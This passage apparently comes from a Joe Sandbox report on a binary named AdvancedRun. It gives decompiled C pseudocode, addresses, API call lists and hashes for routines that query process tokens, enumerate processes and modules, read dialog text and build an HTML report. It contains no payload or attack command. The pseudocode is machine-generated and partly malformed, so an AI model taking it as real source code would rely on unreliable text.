                                                                  • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                  • String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
                                                                  • API String ID: 3037099051-2314623505
                                                                  • Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                  • Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
                                                                  • Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                  • Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00409A94, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 154libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 44%
                                                                  			E00409A94(long _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				void* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				void _v315;
				char _v316;
				void _v826;
				char _v828;
				void _v1338;
				char _v1340;
				void* __esi;
				void* _t61;
				_Unknown_base(*)()* _t93;
				void* _t94;
				int _t106;
				void* _t108;
				void* _t110;

				_v828 = 0;
				memset( &_v826, 0, 0x1fe);
				_v1340 = 0;
				memset( &_v1338, 0, 0x1fe);
				_t110 = _t108 + 0x18;
				_t61 = OpenProcess(0x400, 0, _a4);
				_t113 = _t61;
				_v20 = _t61;
				if(_t61 == 0) {
					L11:
					if(_v828 == 0) {
						__eflags = 0;
						return 0;
					}
					_push( &_v828);
					_push( &_v1340);
					_push(L"%s\\%s");
					_push(0xff);
					_push(_a8);
					L0040B1EC();
					return 1;
				}
				_v8 = 0;
				_v24 = 0;
				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
				_t106 = _v24;
				if(_t106 == 0) {
					_t32 =  &_v20; // 0x4059ec
					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
					_v316 = 0;
					memset( &_v315, 0, 0xfe);
					_t110 = _t110 + 0x20;
					_v16 = 0xff;
					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
					if(__eflags == 0) {
						L9:
						CloseHandle(_v20);
						if(_v8 != 0) {
							FreeLibrary(_v8);
						}
						goto L11;
					}
					_push( &_v28);
					_push( &_a4);
					_push( &_v1340);
					_push( &_v12);
					_push( &_v828);
					_a4 = 0xff;
					_push( &_v316);
					L8:
					_v12 = 0xff;
					E0040906D( &_v8, _t117);
					goto L9;
				}
				_v316 = 0;
				memset( &_v315, 0, 0xff);
				_v12 = _t106;
				_t110 = _t110 + 0xc;
				_a4 = 0;
				if(E00408F72( &_v8) == 0) {
					goto L9;
				}
				_t93 = GetProcAddress(_v8, "GetTokenInformation");
				if(_t93 == 0) {
					goto L9;
				}
				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
				_t117 = _t94;
				if(_t94 == 0) {
					goto L9;
				}
				_push( &_v28);
				_push( &_v12);
				_push( &_v1340);
				_push( &_v16);
				_push( &_v828);
				_push(_v316);
				_v16 = 0xff;
				goto L8;
			}



























                                                                  0x00409ab0
                                                                  0x00409ab7
                                                                  0x00409ac8
                                                                  0x00409acf
                                                                  0x00409ad4
                                                                  0x00409ae0
                                                                  0x00409ae6
                                                                  0x00409ae8
                                                                  0x00409af0
                                                                  0x00409c3a
                                                                  0x00409c41
                                                                  0x00409c67
                                                                  0x00000000
                                                                  0x00409c67
                                                                  0x00409c49
                                                                  0x00409c50
                                                                  0x00409c51
                                                                  0x00409c56
                                                                  0x00409c57
                                                                  0x00409c5a
                                                                  0x00000000
                                                                  0x00409c64
                                                                  0x00409b00
                                                                  0x00409b03
                                                                  0x00409b06
                                                                  0x00409b0b
                                                                  0x00409b10
                                                                  0x00409ba9
                                                                  0x00409bac
                                                                  0x00409bc1
                                                                  0x00409bc7
                                                                  0x00409bcc
                                                                  0x00409bd8
                                                                  0x00409bf0
                                                                  0x00409bf2
                                                                  0x00409c23
                                                                  0x00409c26
                                                                  0x00409c2f
                                                                  0x00409c34
                                                                  0x00409c34
                                                                  0x00000000
                                                                  0x00409c2f
                                                                  0x00409bf7
                                                                  0x00409bfb
                                                                  0x00409c02
                                                                  0x00409c06
                                                                  0x00409c0d
                                                                  0x00409c14
                                                                  0x00409c17
                                                                  0x00409c18
                                                                  0x00409c1b
                                                                  0x00409c1e
                                                                  0x00000000
                                                                  0x00409c1e
                                                                  0x00409b1f
                                                                  0x00409b25
                                                                  0x00409b2a
                                                                  0x00409b2d
                                                                  0x00409b33
                                                                  0x00409b3d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00409b4b
                                                                  0x00409b53
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00409b6a
                                                                  0x00409b6c
                                                                  0x00409b6e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00409b77
                                                                  0x00409b7b
                                                                  0x00409b82
                                                                  0x00409b86
                                                                  0x00409b8d
                                                                  0x00409b8e
                                                                  0x00409b94
                                                                  0x00000000

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00409AB7
                                                                  • memset.MSVCRT ref: 00409ACF
                                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                  • _snwprintf.MSVCRT ref: 00409C5A
                                                                    • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                  • memset.MSVCRT ref: 00409B25
                                                                  • GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                  • memset.MSVCRT ref: 00409BC7
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
                                                                  • String ID: %s\%s$GetTokenInformation$Y@
                                                                  • API String ID: 3504373036-27875219
                                                                  • Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                  • Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
                                                                  • Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                  • Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00409172, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00409172() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t5;

				if( *0x4101bc != 0) {
					return _t1;
				}
				_t2 = E00405436(L"psapi.dll");
				_t5 = _t2;
				if(_t5 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
					 *0x40f848 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t5, "EnumProcessModules");
						 *0x40f840 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
							 *0x40f838 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t5, "EnumProcesses");
								 *0x40fa6c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t5, "GetModuleInformation");
									 *0x40f844 = _t2;
									if(_t2 != 0) {
										 *0x4101bc = 1;
									}
								}
							}
						}
					}
					if( *0x4101bc == 0) {
						_t2 = FreeLibrary(_t5);
					}
					goto L10;
				}
			}






                                                                  0x00409179
                                                                  0x00409209
                                                                  0x00409209
                                                                  0x00409185
                                                                  0x0040918a
                                                                  0x0040918f
                                                                  0x00409208
                                                                  0x00000000
                                                                  0x00409191
                                                                  0x0040919e
                                                                  0x004091a2
                                                                  0x004091a7
                                                                  0x004091af
                                                                  0x004091b3
                                                                  0x004091b8
                                                                  0x004091c0
                                                                  0x004091c4
                                                                  0x004091c9
                                                                  0x004091d1
                                                                  0x004091d5
                                                                  0x004091da
                                                                  0x004091e2
                                                                  0x004091e6
                                                                  0x004091eb
                                                                  0x004091ed
                                                                  0x004091ed
                                                                  0x004091eb
                                                                  0x004091da
                                                                  0x004091c9
                                                                  0x004091b8
                                                                  0x004091ff
                                                                  0x00409202
                                                                  0x00409202
                                                                  0x00000000
                                                                  0x004091ff

                                                                  APIs
                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00409202
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$Library$Load$Freememsetwcscat
                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                  • API String ID: 1182944575-70141382
                                                                  • Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                  • Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
                                                                  • Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                  • Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004090EE, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E004090EE() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x4101b8 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleW(L"kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x40f83c = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x40f834 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x40f830 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x40f5c4 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x40f828 = _t2;
								if(_t2 != 0) {
									 *0x4101b8 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}






                                                                  0x004090f5
                                                                  0x00409171
                                                                  0x00409171
                                                                  0x004090fd
                                                                  0x00409103
                                                                  0x00409107
                                                                  0x00409170
                                                                  0x00000000
                                                                  0x00409170
                                                                  0x00409116
                                                                  0x0040911a
                                                                  0x0040911f
                                                                  0x00409127
                                                                  0x0040912b
                                                                  0x00409130
                                                                  0x00409138
                                                                  0x0040913c
                                                                  0x00409141
                                                                  0x00409149
                                                                  0x0040914d
                                                                  0x00409152
                                                                  0x0040915a
                                                                  0x0040915e
                                                                  0x00409163
                                                                  0x00409165
                                                                  0x00409165
                                                                  0x00409163
                                                                  0x00409152
                                                                  0x00409141
                                                                  0x00409130
                                                                  0x00000000

                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule
                                                                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                  • API String ID: 667068680-3953557276
                                                                  • Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                  • Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
                                                                  • Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                  • Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00409F9C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 56%
                                                                  			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void _v1538;
				char _v1540;
				void* _t39;
				intOrPtr* _t50;
				void* _t61;

				_t50 = __ecx;
				_push(0x1fe);
				_push(0);
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_v1540 = 0;
					memset( &_v1538, ??, ??);
					_v1028 = 0;
					memset( &_v1026, 0, 0x1fe);
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					L0040B1EC();
					 *((long long*)(_t61 + 0x2c)) = _a16;
					L0040B1EC();
					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
					if (_t39 != 0) goto L3;
					return _t39;
				}
				_v516 = 0;
				memset( &_v514, ??, ??);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fe);
				L0040B1EC();
				 *((long long*)(_t61 + 0x20)) =  *_a12;
				L0040B1EC();
				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
			}












                                                                  0x00409faf
                                                                  0x00409fb4
                                                                  0x00409fb5
                                                                  0x00409fb6
                                                                  0x0040a043
                                                                  0x0040a04a
                                                                  0x0040a058
                                                                  0x0040a05f
                                                                  0x0040a06d
                                                                  0x0040a074
                                                                  0x0040a08e
                                                                  0x0040a099
                                                                  0x0040a0ab
                                                                  0x0040a0c9
                                                                  0x0040a0ce
                                                                  0x00000000
                                                                  0x0040a0ce
                                                                  0x00409fc3
                                                                  0x00409fca
                                                                  0x00409fd8
                                                                  0x00409fdf
                                                                  0x00409ff9
                                                                  0x0040a006
                                                                  0x0040a018
                                                                  0x00000000

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$_snwprintf
                                                                  • String ID: %%0.%df
                                                                  • API String ID: 3473751417-763548558
                                                                  • Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                  • Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
                                                                  • Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                  • Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040620E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 51%
                                                                  			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
				void _v8202;
				short _v8204;
				void* _t27;
				short _t29;
				short _t40;
				void* _t41;
				struct HMENU__* _t43;
				short _t50;
				void* _t52;
				struct HMENU__* _t59;

				E0040B550(0x2008, __ecx);
				_t65 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t50 =  *0x40fe2c; // 0x0
						__eflags = _t50;
						if(_t50 == 0) {
							L8:
							_push(_a12);
							_t27 = 5;
							E00405E8D(_t27);
							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
							__eflags = _t29;
							_a8 = _t29;
							if(_t29 == 0) {
								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
							}
							_v8204 = 0;
							memset( &_v8202, 0, 0x2000);
							GetWindowTextW(_a8,  &_v8204, 0x1000);
							__eflags = _v8204;
							if(__eflags != 0) {
								E00405FAC(__eflags, L"caption",  &_v8204, 0);
							}
							EnumChildWindows(_a8, E0040614F, 0);
							DestroyWindow(_a8);
						} else {
							while(1) {
								_t40 =  *_t50;
								__eflags = _t40;
								if(_t40 == 0) {
									goto L8;
								}
								__eflags = _t40 - _a12;
								if(_t40 != _a12) {
									_t50 = _t50 + 4;
									__eflags = _t50;
									continue;
								}
								goto L13;
							}
							goto L8;
						}
					}
				} else {
					_push(_a12);
					_t41 = 4;
					E00405E8D(_t41);
					_pop(_t52);
					_t43 = LoadMenuW(_a4, _a12);
					 *0x40fe20 =  *0x40fe20 & 0x00000000;
					_t59 = _t43;
					_push(1);
					_push(_t59);
					_push(_a12);
					E0040605E(_t52, _t65);
					DestroyMenu(_t59);
				}
				L13:
				return 1;
			}













                                                                  0x00406216
                                                                  0x0040621b
                                                                  0x00406222
                                                                  0x0040625f
                                                                  0x00406263
                                                                  0x00406269
                                                                  0x00406271
                                                                  0x00406273
                                                                  0x00406289
                                                                  0x00406289
                                                                  0x0040628e
                                                                  0x0040628f
                                                                  0x004062a9
                                                                  0x004062ab
                                                                  0x004062ad
                                                                  0x004062b0
                                                                  0x004062c3
                                                                  0x004062c3
                                                                  0x004062d3
                                                                  0x004062da
                                                                  0x004062f1
                                                                  0x004062f7
                                                                  0x004062fe
                                                                  0x0040630d
                                                                  0x00406312
                                                                  0x0040631e
                                                                  0x00406327
                                                                  0x00406275
                                                                  0x00406283
                                                                  0x00406283
                                                                  0x00406285
                                                                  0x00406287
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406277
                                                                  0x0040627a
                                                                  0x00406280
                                                                  0x00406280
                                                                  0x00000000
                                                                  0x00406280
                                                                  0x00000000
                                                                  0x0040627a
                                                                  0x00000000
                                                                  0x00406283
                                                                  0x00406273
                                                                  0x00406224
                                                                  0x00406224
                                                                  0x00406229
                                                                  0x0040622a
                                                                  0x0040622f
                                                                  0x00406236
                                                                  0x0040623c
                                                                  0x00406243
                                                                  0x00406245
                                                                  0x00406247
                                                                  0x00406248
                                                                  0x0040624b
                                                                  0x00406254
                                                                  0x00406254
                                                                  0x0040632d
                                                                  0x00406334

                                                                  APIs
                                                                  • LoadMenuW.USER32 ref: 00406236
                                                                    • Part of subcall function 0040605E: GetMenuItemCount.USER32(?), ref: 00406074
                                                                    • Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
                                                                    • Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
                                                                    • Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7
                                                                  • DestroyMenu.USER32(00000000), ref: 00406254
                                                                  • CreateDialogParamW.USER32 ref: 004062A9
                                                                  • GetDesktopWindow.USER32 ref: 004062B4
                                                                  • CreateDialogParamW.USER32 ref: 004062C1
                                                                  • memset.MSVCRT ref: 004062DA
                                                                  • GetWindowTextW.USER32 ref: 004062F1
                                                                  • EnumChildWindows.USER32 ref: 0040631E
                                                                  • DestroyWindow.USER32(00000005), ref: 00406327
                                                                    • Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                  • String ID: caption
                                                                  • API String ID: 973020956-4135340389
                                                                  • Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                  • Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
                                                                  • Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                  • Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004081E4, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 65%
                                                                  			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void _v2050;
				char _v2052;
				void _v4098;
				long _v4100;
				void _v6146;
				char _v6148;
				void* __esi;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;
				intOrPtr _t62;
				intOrPtr _t63;

				_t49 = __ecx;
				E0040B550(0x1800, __ecx);
				_t57 = _t49;
				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v4100 = 0;
				memset( &_v4098, 0, 0x7fe);
				_v2052 = 0;
				memset( &_v2050, 0, 0x7fe);
				_v6148 = 0;
				memset( &_v6146, 0, 0x7fe);
				_t59 = _t58 + 0x24;
				_t62 =  *0x40fe30; // 0x0
				if(_t62 != 0) {
					_push(0x40fe30);
					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
					_push(0x400);
					_push( &_v2052);
					L0040B1EC();
					_t59 = _t59 + 0x10;
				}
				_t63 =  *0x40fe28; // 0x0
				if(_t63 != 0) {
					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
				}
				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_push(0x400);
				_push( &_v6148);
				L0040B1EC();
				_t43 = E00407343(_t57, _a4,  &_v6148);
				_t64 = _a8 - 5;
				if(_a8 == 5) {
					return E00407D03(_t57, _t64, _a4);
				}
				return _t43;
			}

















                                                                  0x004081e4
                                                                  0x004081ec
                                                                  0x004081fc
                                                                  0x00408200
                                                                  0x00408215
                                                                  0x0040821c
                                                                  0x0040822a
                                                                  0x00408231
                                                                  0x0040823f
                                                                  0x00408246
                                                                  0x0040824b
                                                                  0x0040824e
                                                                  0x0040825a
                                                                  0x0040825c
                                                                  0x00408261
                                                                  0x0040826c
                                                                  0x0040826d
                                                                  0x0040826e
                                                                  0x00408273
                                                                  0x00408273
                                                                  0x00408276
                                                                  0x0040827c
                                                                  0x0040828a
                                                                  0x00408290
                                                                  0x004082ab
                                                                  0x004082c5
                                                                  0x004082c6
                                                                  0x004082d1
                                                                  0x004082d2
                                                                  0x004082d3
                                                                  0x004082e7
                                                                  0x004082ec
                                                                  0x004082f0
                                                                  0x00000000
                                                                  0x004082f5
                                                                  0x004082fe

                                                                  APIs
                                                                  Strings
                                                                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
                                                                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
                                                                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
                                                                  • <table dir="rtl"><tr><td>, xrefs: 00408284
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$_snwprintf$wcscpy
                                                                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                  • API String ID: 1283228442-2366825230
                                                                  • Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                  • Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
                                                                  • Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                  • Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040920A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 85%
                                                                  			E0040920A(wchar_t* __edi, wchar_t* __esi) {
				void _v526;
				long _v528;
				wchar_t* _t17;
				signed int _t40;
				wchar_t* _t50;

				_t50 = __edi;
